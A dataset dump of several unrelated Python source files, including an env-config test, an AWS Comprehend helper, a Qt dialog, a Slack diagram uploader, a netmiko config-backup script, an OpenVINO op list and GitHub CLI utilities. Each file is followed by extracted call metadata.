DAtek/datek-app-utils | tests/env_config/test_base.py | 4783345d548bd85b1f6f99679be30b978e368e0e | from pytest import raises
from datek_app_utils.env_config.base import BaseConfig
from datek_app_utils.env_config.errors import InstantiationForbiddenError
class SomeOtherMixinWhichDoesntRelateToEnvConfig:
color = "red"
class TestConfig:
def test_iter(self, monkeypatch, key_volume, base_config_class):
volume = 5
monkeypatch.setenv(key_volume, str(volume))
class Config(SomeOtherMixinWhichDoesntRelateToEnvConfig, base_config_class):
TYPE: str
items = [item for item in Config]
assert len(items) == 5
assert Config.color == "red"
assert items[0].name == "TYPE"
assert items[0].value is None
assert items[0].type == str
assert items[1].name == "FIELD_WITH_DEFAULT_VALUE"
assert items[1].value == "C"
assert items[1].type == str
assert items[2].name == "NON_MANDATORY_FIELD"
assert items[2].value is None
assert items[2].type == str
assert items[3].name == "TYPED_NON_MANDATORY_FIELD"
assert items[3].value is None
assert items[3].type == str
assert items[4].name == "VOLUME"
assert items[4].value == volume
assert items[4].type == int
def test_get(self, monkeypatch, key_volume, base_config_class):
volume = 10
monkeypatch.setenv(key_volume, str(volume))
assert getattr(base_config_class, "VOLUME") == volume
def test_constructor_is_forbidden(self):
class Config(BaseConfig):
pass
with raises(InstantiationForbiddenError):
Config()
| [((54, 13, 54, 48), 'pytest.raises', 'raises', ({(54, 20, 54, 47): 'InstantiationForbiddenError'}, {}), '(InstantiationForbiddenError)', False, 'from pytest import raises\n')] |
korniichuk/cvr-features | comprehend.py | ed3569222781258d4de242db3c9b51f19573bacb | # -*- coding: utf-8 -*-
# Name: comprehend
# Version: 0.1a2
# Owner: Ruslan Korniichuk
# Maintainer(s):
import boto3
def get_sentiment(text, language_code='en'):
"""Get sentiment.
Inspects text and returns an inference of the prevailing sentiment
(positive, neutral, mixed, or negative).
Args:
        text: UTF-8 text string. Each string must contain fewer than
5,000 bytes of UTF-8 encoded characters (required | type: str).
language_code: language of text (not required | type: str |
default: 'en').
Returns:
        sentiment: positive, neutral, mixed, or negative
(type: str).
"""
def prepare_text(text):
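        # Keep the text under 5,000 bytes of UTF-8, as Comprehend requires,
        # by trimming trailing characters.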
while len(bytes(text, 'utf-8')) > 4999:
text = text[:-1]
return text
comprehend = boto3.client('comprehend')
text = prepare_text(text)
    r = comprehend.detect_sentiment(Text=text, LanguageCode=language_code)
sentiment = r['Sentiment'].lower()
return sentiment
# Example. Get sentiment of text below:
# "I ordered a small and expected it to fit just right but it was a little bit
# more like a medium-large. It was great quality. It's a lighter brown than
# pictured but fairly close. Would be ten times better if it was lined with
# cotton or wool on the inside."
# text = "I ordered a small and expected it to fit just right but it was a \
# little bit more like a medium-large. It was great quality. It's a \
# lighter brown than pictured but fairly close. Would be ten times \
# better if it was lined with cotton or wool on the inside."
# get_sentiment(text)
| [((33, 17, 33, 43), 'boto3.client', 'boto3.client', ({(33, 30, 33, 42): '"""comprehend"""'}, {}), "('comprehend')", False, 'import boto3\n')] |
Kayvv/mapclientplugins.argonsceneexporterstep | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'configuredialog.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class Ui_ConfigureDialog(object):
def setupUi(self, ConfigureDialog):
if not ConfigureDialog.objectName():
ConfigureDialog.setObjectName(u"ConfigureDialog")
ConfigureDialog.resize(510, 342)
self.gridLayout = QGridLayout(ConfigureDialog)
self.gridLayout.setObjectName(u"gridLayout")
self.configGroupBox = QGroupBox(ConfigureDialog)
self.configGroupBox.setObjectName(u"configGroupBox")
self.formLayout = QFormLayout(self.configGroupBox)
self.formLayout.setObjectName(u"formLayout")
self.label0 = QLabel(self.configGroupBox)
self.label0.setObjectName(u"label0")
self.formLayout.setWidget(0, QFormLayout.LabelRole, self.label0)
self.lineEditIdentifier = QLineEdit(self.configGroupBox)
self.lineEditIdentifier.setObjectName(u"lineEditIdentifier")
self.formLayout.setWidget(0, QFormLayout.FieldRole, self.lineEditIdentifier)
self.label_3 = QLabel(self.configGroupBox)
self.label_3.setObjectName(u"label_3")
self.formLayout.setWidget(1, QFormLayout.LabelRole, self.label_3)
self.prefix_lineEdit = QLineEdit(self.configGroupBox)
self.prefix_lineEdit.setObjectName(u"prefix_lineEdit")
self.formLayout.setWidget(1, QFormLayout.FieldRole, self.prefix_lineEdit)
self.label_4 = QLabel(self.configGroupBox)
self.label_4.setObjectName(u"label_4")
self.formLayout.setWidget(3, QFormLayout.LabelRole, self.label_4)
self.timeSteps_lineEdit = QLineEdit(self.configGroupBox)
self.timeSteps_lineEdit.setObjectName(u"timeSteps_lineEdit")
self.formLayout.setWidget(3, QFormLayout.FieldRole, self.timeSteps_lineEdit)
self.label = QLabel(self.configGroupBox)
self.label.setObjectName(u"label")
self.formLayout.setWidget(4, QFormLayout.LabelRole, self.label)
self.initialTime_lineEdit = QLineEdit(self.configGroupBox)
self.initialTime_lineEdit.setObjectName(u"initialTime_lineEdit")
self.formLayout.setWidget(4, QFormLayout.FieldRole, self.initialTime_lineEdit)
self.label_2 = QLabel(self.configGroupBox)
self.label_2.setObjectName(u"label_2")
self.formLayout.setWidget(5, QFormLayout.LabelRole, self.label_2)
self.finishTime_lineEdit = QLineEdit(self.configGroupBox)
self.finishTime_lineEdit.setObjectName(u"finishTime_lineEdit")
self.formLayout.setWidget(5, QFormLayout.FieldRole, self.finishTime_lineEdit)
self.label1 = QLabel(self.configGroupBox)
self.label1.setObjectName(u"label1")
self.formLayout.setWidget(6, QFormLayout.LabelRole, self.label1)
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.lineEditOutputDirectory = QLineEdit(self.configGroupBox)
self.lineEditOutputDirectory.setObjectName(u"lineEditOutputDirectory")
self.horizontalLayout.addWidget(self.lineEditOutputDirectory)
self.pushButtonOutputDirectory = QPushButton(self.configGroupBox)
self.pushButtonOutputDirectory.setObjectName(u"pushButtonOutputDirectory")
self.horizontalLayout.addWidget(self.pushButtonOutputDirectory)
self.formLayout.setLayout(6, QFormLayout.FieldRole, self.horizontalLayout)
self.label_5 = QLabel(self.configGroupBox)
self.label_5.setObjectName(u"label_5")
self.formLayout.setWidget(2, QFormLayout.LabelRole, self.label_5)
self.comboBoxExportType = QComboBox(self.configGroupBox)
self.comboBoxExportType.addItem("")
self.comboBoxExportType.addItem("")
self.comboBoxExportType.setObjectName(u"comboBoxExportType")
self.formLayout.setWidget(2, QFormLayout.FieldRole, self.comboBoxExportType)
self.gridLayout.addWidget(self.configGroupBox, 0, 0, 1, 1)
self.buttonBox = QDialogButtonBox(ConfigureDialog)
self.buttonBox.setObjectName(u"buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
QWidget.setTabOrder(self.lineEditIdentifier, self.prefix_lineEdit)
QWidget.setTabOrder(self.prefix_lineEdit, self.comboBoxExportType)
QWidget.setTabOrder(self.comboBoxExportType, self.timeSteps_lineEdit)
QWidget.setTabOrder(self.timeSteps_lineEdit, self.initialTime_lineEdit)
QWidget.setTabOrder(self.initialTime_lineEdit, self.finishTime_lineEdit)
QWidget.setTabOrder(self.finishTime_lineEdit, self.lineEditOutputDirectory)
QWidget.setTabOrder(self.lineEditOutputDirectory, self.pushButtonOutputDirectory)
self.retranslateUi(ConfigureDialog)
self.buttonBox.accepted.connect(ConfigureDialog.accept)
self.buttonBox.rejected.connect(ConfigureDialog.reject)
self.comboBoxExportType.setCurrentIndex(0)
QMetaObject.connectSlotsByName(ConfigureDialog)
# setupUi
def retranslateUi(self, ConfigureDialog):
ConfigureDialog.setWindowTitle(QCoreApplication.translate("ConfigureDialog", u"Configure Step", None))
self.configGroupBox.setTitle("")
self.label0.setText(QCoreApplication.translate("ConfigureDialog", u"identifier: ", None))
self.label_3.setText(QCoreApplication.translate("ConfigureDialog", u"Prefix : ", None))
self.label_4.setText(QCoreApplication.translate("ConfigureDialog", u"Time Steps : ", None))
self.label.setText(QCoreApplication.translate("ConfigureDialog", u"Initial Time : ", None))
self.label_2.setText(QCoreApplication.translate("ConfigureDialog", u"Finish Time : ", None))
self.label1.setText(QCoreApplication.translate("ConfigureDialog", u"Output directory:", None))
self.pushButtonOutputDirectory.setText(QCoreApplication.translate("ConfigureDialog", u"...", None))
self.label_5.setText(QCoreApplication.translate("ConfigureDialog", u"Export type:", None))
self.comboBoxExportType.setItemText(0, QCoreApplication.translate("ConfigureDialog", u"webgl", None))
self.comboBoxExportType.setItemText(1, QCoreApplication.translate("ConfigureDialog", u"thumbnail", None))
# retranslateUi
| [] |
owasp-sbot/pbx-gs-python-utils | pbx_gs_python_utils/lambdas/utils/puml_to_slack.py | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | import base64
import tempfile
import requests
from osbot_aws.apis import Secrets
from osbot_aws.apis.Lambdas import Lambdas
def upload_png_file(channel_id, file):
bot_token = Secrets('slack-gs-bot').value()
my_file = {
'file': ('/tmp/myfile.png', open(file, 'rb'), 'png')
}
payload = {
"filename" : 'image.png',
"token" : bot_token,
"channels" : [channel_id],
}
requests.post("https://slack.com/api/files.upload", params=payload, files=my_file)
return 'image sent .... '
def run(event, context):
channel = event['channel']
puml = event['puml']
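    # Slack delivers the message HTML-escaped; restore the angle brackets that
    # the PlantUML source needs.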
puml = puml.replace('<', '<').replace('>', '>')
    (fd, tmp_file) = tempfile.mkstemp('.png')
    puml_to_png = Lambdas('utils.puml_to_png').invoke  # match the Lambdas import above
result = puml_to_png({"puml": puml })
with open(tmp_file, "wb") as fh:
fh.write(base64.decodebytes(result['png_base64'].encode()))
return upload_png_file(channel, tmp_file)
| [((19, 4, 19, 86), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((28, 22, 28, 46), 'tempfile.mkstemp', 'tempfile.mkstemp', ({(28, 39, 28, 45): '"""png)"""'}, {}), "('png)')", False, 'import tempfile\n'), ((9, 16, 9, 39), 'osbot_aws.apis.Secrets', 'Secrets', ({(9, 24, 9, 38): '"""slack-gs-bot"""'}, {}), "('slack-gs-bot')", False, 'from osbot_aws.apis import Secrets\n')] |
DeseineClement/bigdata-housing-classifier | src/system_io/input.py | aa864056c8b25217821f59d16c1ba5725c21a185 | from sys import argv
from getopt import getopt
from os import R_OK, access
from string import Template
DEFAULT_DATASET_FILE_PATH = "dataset/data.csv"
DEFAULT_DATASET_COLUMNS = ['surface (m2)', 'height (m)', 'latitude', 'housing_type', 'longitude', 'country_code',
'city']
DEFAULT_VISU = ["scatter_plot", "histogram"]
DEFAULT_RANGE = [0, 1000]
def arguments():
    options, *_ = getopt(argv[1:], 'd:c:v:r:', ['dataset-file=', 'columns=', 'visus=', 'range='])
dataset_file = DEFAULT_DATASET_FILE_PATH
dataset_columns = DEFAULT_DATASET_COLUMNS
dataset_visus = DEFAULT_VISU
dataset_range = DEFAULT_RANGE
for opt, arg in options:
if opt in ('-d', '--dataset-file'):
dataset_file = arg
elif opt in ('-c', '--columns'):
dataset_columns = arg.split(',')
elif opt in ('-v', '--visus'):
dataset_visus = arg.split(',')
elif opt in ('-r', '--range'):
dataset_range = arg.split(',')
dataset_range = list(map(lambda x: int(x), dataset_range))
        if len(dataset_range) == 1:
dataset_range.append(DEFAULT_RANGE[1])
if not access(dataset_file, R_OK):
raise RuntimeError(Template("the file $file does not exists or is not readable.").substitute(file=dataset_file))
for column in dataset_columns:
if column not in DEFAULT_DATASET_COLUMNS:
raise RuntimeError(Template("Invalid column $column must be one of $columns.").
substitute(column=column, columns=','.join(DEFAULT_DATASET_COLUMNS)))
for visu in dataset_visus:
if visu not in DEFAULT_VISU:
raise RuntimeError(Template("Invalid visu $column must be one of $columns.").
substitute(column=visu, columns=','.join(DEFAULT_VISU)))
for range_num in dataset_range:
if range_num not in range(0, 1001):
raise RuntimeError(Template("Invalid range $column must be between 0 and 999.").
substitute(column=range_num))
return dataset_file, dataset_columns, dataset_visus, dataset_range
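# Example invocation (hypothetical entry script):
#   python main.py --dataset-file=dataset/data.csv --columns=city,latitude \
#       --visus=histogram --range=0,500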
| [((13, 18, 13, 91), 'getopt.getopt', 'getopt', ({(13, 25, 13, 33): 'argv[1:]', (13, 35, 13, 39): '"""dc"""', (13, 41, 13, 90): "['dataset-file=', 'columns=', 'visus=', 'range=']"}, {}), "(argv[1:], 'dc', ['dataset-file=', 'columns=', 'visus=', 'range='])", False, 'from getopt import getopt\n'), ((32, 11, 32, 37), 'os.access', 'access', ({(32, 18, 32, 30): 'dataset_file', (32, 32, 32, 36): 'R_OK'}, {}), '(dataset_file, R_OK)', False, 'from os import R_OK, access\n'), ((33, 27, 33, 89), 'string.Template', 'Template', ({(33, 36, 33, 88): '"""the file $file does not exists or is not readable."""'}, {}), "('the file $file does not exists or is not readable.')", False, 'from string import Template\n'), ((37, 31, 37, 90), 'string.Template', 'Template', ({(37, 40, 37, 89): '"""Invalid column $column must be one of $columns."""'}, {}), "('Invalid column $column must be one of $columns.')", False, 'from string import Template\n'), ((42, 31, 42, 88), 'string.Template', 'Template', ({(42, 40, 42, 87): '"""Invalid visu $column must be one of $columns."""'}, {}), "('Invalid visu $column must be one of $columns.')", False, 'from string import Template\n'), ((47, 31, 47, 91), 'string.Template', 'Template', ({(47, 40, 47, 90): '"""Invalid range $column must be between 0 and 999."""'}, {}), "('Invalid range $column must be between 0 and 999.')", False, 'from string import Template\n')] |
Tes3awy/Ntemiko-Examples | netmiko/example7.py | b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba | # Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Convert the MGMT IP Address column of the data frame to a list
device_ip_list = df.iloc[:, 1].tolist()
# Define devices variable
devices = []
for ip in device_ip_list:
devices.append(
{
"device_type": "cisco_ios", # must be the same for all devices
"ip": ip,
"username": "developer", # must be the same for all devices
"password": "C1sco12345", # must be the same for all devices
"port": 22, # must be the same for all devices
# If port for all devices is not 22 you will get an error
"fast_cli": False,
}
)
for device in devices:
# Create a connection instance
with ConnectHandler(**device) as net_connect:
# hostname of the current device
hostname = net_connect.send_command(
command_string="show version", use_textfsm=True
)[0]["hostname"]
run_cfg: str = net_connect.send_command(command_string="show running-config")
# Create .txt for each running configuration of each device
with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
outfile.write(run_cfg.lstrip())
print("Done")
| [((9, 7, 9, 69), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((12, 5, 12, 28), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((35, 9, 35, 33), 'netmiko.ConnectHandler', 'ConnectHandler', ({}, {}), '(**device)', False, 'from netmiko import ConnectHandler\n')] |
plaidml/openvino | inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | e784ab8ab7821cc1503d9c5ca6034eea112bf52b | # Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
VERIFIED_OP_REFERENCES = [
'Abs-1',
'Acos-1',
'Add-1',
'Asin-1',
'Asinh-3',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BatchToSpace-2',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'Ceiling-1',
'CTCGreedyDecoder-1',
'CTCGreedyDecoderSeqLen-6',
'Concat-1',
'Convert-1',
'ConvertLike-1',
'Convolution-1',
'Constant-1',
'Cos-1',
'Cosh-1',
'DeformableConvolution-1',
'DeformablePSROIPooling-1',
'DepthToSpace-1',
'DetectionOutput-1',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'FakeQuantize-1',
    'Floor-1',
    'FloorMod-1',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GRN-1',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-1',
'Interpolate-4',
'LRN-1',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'Maximum-1',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'Negative-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'NonZero-3',
'NormalizeL2-1',
'PriorBox-1',
'PriorBoxClustered-1',
'Proposal-1',
'Proposal-4',
'PSROIPooling-1',
'RNNSequence-5',
'ROIAlign-3',
'ROIPooling-2',
'Range-1',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceLogicalAnd-1',
'ReduceLogicalOr-1',
'ReduceMax-1',
'ReduceMean-1',
'ReduceMin-1',
'ReduceProd-1',
'ReduceSum-1',
'RegionYOLO-1',
'Relu-1',
'ReorgYOLO-2',
    'Result-1',
    'Round-5',
'SpaceToDepth-1',
'ScatterNDUpdate-4',
'Select-1',
'ShapeOf-1',
'ShapeOf-3',
'ShuffleChannels-1',
'Sigmoid-1',
'Sign-1',
'Sin-1',
    'Sinh-1',
    'SoftPlus-4',
'Softmax-1',
'Split-1',
'Squeeze-1',
'StridedSlice-1',
'Subtract-1',
'Swish-4',
'Tile-1',
'TopK-1',
'TopK-3',
'Transpose-1',
'Unsqueeze-1',
'VariadicSplit-1',
]
| [] |
mahanthathreyee/ghub | ghub/githubutils.py | b212ca068ef530d034095e6ef5d964e4e78dc022 | """Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
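# Usage sketch (not part of the ghub API): the mapping above turns raw GitHub
# issue-event payloads into one-line summaries. Assuming `events` is the JSON
# list returned by GitHub's issue-events endpoint, a caller might render it as:
#
#   for event in events:
#       handler = event_dict.get(event["event"])
#       if handler:
#           print(handler(event))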
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
    reauthorize -- performs authorization again (default False)
    fromenv -- read the OAuth token from the GHUB_CRED environment variable (default False)
    """
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
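# A minimal sketch of driving authorize() from a script, assuming a `ghub`
# object exposing the attributes used above (data_path, auth_filename,
# client_secret and a `github` OAuth2 session); the concrete class lives
# elsewhere in this package.
#
#   authorize(ghub)                     # first run: browser-based OAuth flow
#   authorize(ghub, reauthorize=True)   # discard the cached token and redo it
#   authorize(ghub, fromenv=True)       # read the token from GHUB_CRED instead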
def get_user(ghub, user):
url = ghub.api_url + ghub.endpoints["users"] + user
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "user"
ghub.context.location = user
ghub.context.cache = response.json()
return True
return False
def get_org(ghub, org):
url = ghub.api_url + ghub.endpoints["orgs"] + org
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "org"
ghub.context.location = org
ghub.context.cache = response.json()
return True
return False
def get_user_tabs(ghub, tab=""):
tabs = ["repos", "stars", "followers", "following", "notifications"]
if tab not in tabs:
print("{} is not a valid user tab".format(tab))
return
if ghub.context.context == "root":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
response = ghub.github.get(ghub.api_url + ghub.endpoints["user"] + "/repos")
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "repos"
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "stars"
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/" + tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif tab == "notifications":
response = ghub.github.get(ghub.api_url + ghub.endpoints["notifications"])
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif ghub.context.context == "user" or ghub.context.context == "org":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
if ghub.context.context == "user":
url = (
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/repos"
)
else:
url = (
ghub.api_url
+ ghub.endpoints["orgs"]
+ ghub.context.location
+ "/repos"
)
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "repos"
)
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "star"
)
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/"
+ tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.context.prev_context.location + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
else:
pass
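# Usage note (illustrative): get_user_tabs(ghub, "repos") pushes a new context
# holding the current user's repositories; an empty tab string resets the
# context back to root.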
def get_latest_commit(ghub, repo, branch="master"):
api_url = "https://api.github.com/repos/{}/branches/{}".format(repo, branch)
response = ghub.github.get(api_url)
if response.status_code == 200:
response = response.json()
return response["commit"]["commit"]
else:
return False
def get_tree(ghub, repo=None, branch="master", tree_url=None):
if tree_url == None:
latest_commit = get_latest_commit(ghub, repo, branch)
if latest_commit == False:
return False
response = ghub.github.get(latest_commit["tree"]["url"])
if response.status_code == 200:
response = response.json()
return response
return False
else:
response = ghub.github.get(tree_url)
if response.status_code == 200:
response = response.json()
return response
def get_blob(ghub, blob_url):
response = ghub.github.get(blob_url)
if response.status_code == 200:
return response.json()
return False
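# Illustrative sketch (names are assumptions, not part of this module): listing
# a repository's top-level entries by combining get_tree() and get_blob(). The
# entry shape ("tree", "path", "type", "url") follows GitHub's git-trees API.
#
#   tree = get_tree(ghub, repo="octocat/Hello-World", branch="master")
#   if tree:
#       for entry in tree["tree"]:
#           print(entry["path"], entry["type"])
#           if entry["type"] == "blob":
#               blob = get_blob(ghub, entry["url"])  # content is base64-encoded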
def clone_repo(ghub, dir, repo_name=None):
print("Preparing to clone...")
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
if dir[0] == "~":
dir = os.path.expanduser("~") + dir[1:]
dir = dir + "/" + repo_name.split("/")[1]
try:
Repo.clone_from("https://github.com/" + repo_name, dir)
print("{} cloned to {}".format(repo_name, dir))
return True
except Exception as e:
print(e)
return False
def star_repo(ghub, repo_name=None):
print("Starring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
print("Repo is already starred.")
elif response.status_code == 404:
resp = ghub.github.put(star_url)
if resp.status_code == 204:
print("{} starred".format(repo_name))
else:
print("Error starring repo")
def unstar_repo(ghub, repo_name=None):
print("Unstarring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
resp = ghub.github.delete(star_url)
if resp.status_code == 204:
print("{} unstarred".format(repo_name))
else:
print("Error unstarring repo")
elif response.status_code == 404:
print("Repo is not starred.")
def watch_repo(ghub, repo_name=None):
print("Subscribing to repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
print("You are already watching this repo.")
elif response.status_code == 404:
resp = ghub.github.put(watch_url)
if resp.status_code == 200:
print("Watching {}".format(repo_name))
else:
print("Error subscribing to repo")
def unwatch_repo(ghub, repo_name=None):
print("Unsubscribing repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
resp = ghub.github.delete(watch_url)
if resp.status_code == 204:
print("{} unsubscribed".format(repo_name))
else:
print("Error unsubscribing to repo")
elif response.status_code == 404:
print("You are not watching this repo.")
def fork_repo(ghub, repo_name=None):
print("Forking Repo...")
if repo_name == None:
repo_name = ghub.context.location.split("/")
repo_name = "/".join(repo_name[:2])
true_repo_name = repo_name.split("/")[1]
forked_url = (
ghub.api_url
+ ghub.endpoints["repos"]
+ ghub.get_user_username()
+ "/"
+ true_repo_name
)
response = ghub.github.get(forked_url)
if response.status_code == 200:
print("Cannot fork. Repo Already Exists.")
return False
print("Repo is being forked. Please wait for it to complete.", end="")
response = ghub.github.post(
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/forks"
)
if response.status_code == 202:
print(
"\nForking complete. Forked repo to {}".format(
ghub.get_user_username() + "/" + true_repo_name
)
)
return True
else:
print("Error while trying fork.")
return False
def get_prs(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls"
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_requests"
ghub.context.location = repo_name + "/pull_requests"
